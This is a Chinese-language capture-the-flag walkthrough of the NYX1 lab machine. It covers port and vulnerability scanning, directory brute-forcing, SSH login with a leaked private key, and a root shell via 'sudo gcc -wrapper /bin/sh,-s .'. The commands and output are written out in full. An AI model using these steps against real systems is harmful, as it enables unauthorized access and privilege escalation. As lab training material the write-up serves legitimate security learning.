NYX1

NYX1 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.138
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80 192.1.1.138
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA)
|   256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA)
|_  256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: nyx
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:A7:F7:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.27 seconds

开放了 22 和 80 端口，Linux 操作系统

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.138
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00027s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

udp 的扫描结果仅供参考

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.138          
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:29 EDT
Nmap scan report for nyx.zte.com.cn (192.1.1.138)
Host is up (0.00023s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-enum: 
|_  /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:A7:F7:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.85 seconds

同时，gobuster 开启爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 -x txt,zip,sql,rar,php    
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.138/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,zip,sql,rar,php
[+] Timeout:                 10s
===============================================================
2023/06/16 22:29:24 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/key.php              (Status: 200) [Size: 287]
/.php                 (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
Progress: 1319237 / 1323366 (99.69%)===============================================================
2023/06/16 22:31:41 Finished
===============================================================

目录爆破的结果中 key.php 是个感兴趣的目录，但是打开网页后发现，没有明显的可以被利用的点，尝试了绕过和爆破都没有成功。

私钥泄露

自带漏洞脚本的扫描结果，给出了一个 php 文件

看起来是私钥文件的内容，title 中给了一些敏感信息 mpampis key，猜测可能是 mpampis 的私钥文件，尝试使用私钥登录，一开始忘了文件权限的问题，修改权限为 600 才登录成功

┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ echo -e "rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==" | base64 -d
�!M
   mpampis@nyx
   
┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ ssh -i private mpampis@192.1.1.138      
The authenticity of host '192.1.1.138 (192.1.1.138)' can\'t be established.
ED25519 key fingerprint is SHA256:y+UuWVNQjou5NV3bhJKmkFBqomxtGR0c5ydJPwmIz+E.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.138' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'private' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "private": bad permissions
mpampis@192.1.1.138\'s password: 
Permission denied, please try again.
mpampis@192.1.1.138\'s password: 
Permission denied, please try again.
mpampis@192.1.1.138\'s password: 
mpampis@192.1.1.138: Permission denied (publickey,password).
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ chmod 600 private     
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/nyx]
└─$ ssh -i private mpampis@192.1.1.138
Linux nyx 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
███▄▄▄▄   ▄██   ▄   ▀████    ▐████▀ 
███▀▀▀██▄ ███   ██▄   ███▌   ████▀  
███   ███ ███▄▄▄███    ███  ▐███    
███   ███ ▀▀▀▀▀▀███    ▀███▄███▀    
███   ███ ▄██   ███    ████▀██▄     
███   ███ ███   ███   ▐███  ▀███    
███   ███ ███   ███  ▄███     ███▄  
 ▀█   █▀   ▀█████▀  ████       ███▄ 
Last login: Fri Aug 14 19:15:05 2020 from 192.168.1.18
mpampis@nyx:~$

主机信息收集

mpampis@nyx:~$ cat user.txt 
2cb67a256530577868009a5944d12637
mpampis@nyx:~$ ls -liah
total 36K
138973 drwxr-xr-x 4 mpampis mpampis 4.0K Aug 14  2020 .
    19 drwxr-xr-x 3 root    root    4.0K Aug 14  2020 ..
139223 -rw------- 1 mpampis mpampis  490 Aug 14  2020 .bash_history
138974 -rw-r--r-- 1 mpampis mpampis  220 Aug 14  2020 .bash_logout
138975 -rw-r--r-- 1 mpampis mpampis 3.5K Aug 14  2020 .bashrc
139220 drwxr-xr-x 3 mpampis mpampis 4.0K Aug 14  2020 .local
138976 -rw-r--r-- 1 mpampis mpampis  807 Aug 14  2020 .profile
139214 drwx------ 2 mpampis mpampis 4.0K Aug 14  2020 .ssh
138981 -rw-r--r-- 1 root    root      33 Aug 14  2020 user.txt
mpampis@nyx:~$ tail -n 20 .bash_history 
cd /tmp
bash exp.sh 
exit
bash exp.sh 
ls -la
cat exp.sh 
chmod 04755 rootshell
bash exp.sh 
ls -la
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
which screen
exit
cd /tmpb
cd /tmp
bash exp.sh 
screen -r
bash exp.sh 
screen -S listen_for_exception
exit
exit

mpampis@nyx:/tmp$ ls
systemd-private-2647caf04ec346c69dee7cb0c91684b3-apache2.service-WJsXbP
systemd-private-2647caf04ec346c69dee7cb0c91684b3-systemd-timesyncd.service-sGyxMv
mpampis@nyx:/tmp$ cd -
/home/mpampis
mpampis@nyx:~$ cat .bash_history | grep "exp.sh"
bash exp.sh 
bash exp.sh 
bash exp.sh 
cat exp.sh 
bash exp.sh 
bash exp.sh 
bash exp.sh

提权

bash_history 文件中的信息意义不大。sudo -l 发现有 gcc 的权限，并且不需要密码，借助于 gtfobin，迅速找到了方法。

mpampis@nyx:~$ sudo -l
Matching Defaults entries for mpampis on nyx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mpampis may run the following commands on nyx:
    (root) NOPASSWD: /usr/bin/gcc
mpampis@nyx:~$ cd /tmp
mpampis@nyx:/tmp$ sudo gcc -wrapper /bin/sh,-s .
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
# cd /root
# ls
root.txt
# cat root.txt

补充：key .php 文件

# cat key.php
<?php
$key = $_POST['key'];

if($key == '1165685715469'){
        header("Location: d41d8cd98f00b204e9800998ecf8427e.php");
        exit;
} elseif ($key == "admin" or $key == "root") {
        echo "<center><h3>really? lol</h3></center>";
} else {
        echo "<center><h3>try harder kiddo</h3></center>";
}
?>

<html>
<head>
<title>key</title>
</head>
<body>
<center>
<h2>can u find the key!?</h2>
<form action="" method="POST">
    Enter the key: <input type="text" name="key"/>
    <input type="submit" value="submit">
</form>
</center>
</body>
</html>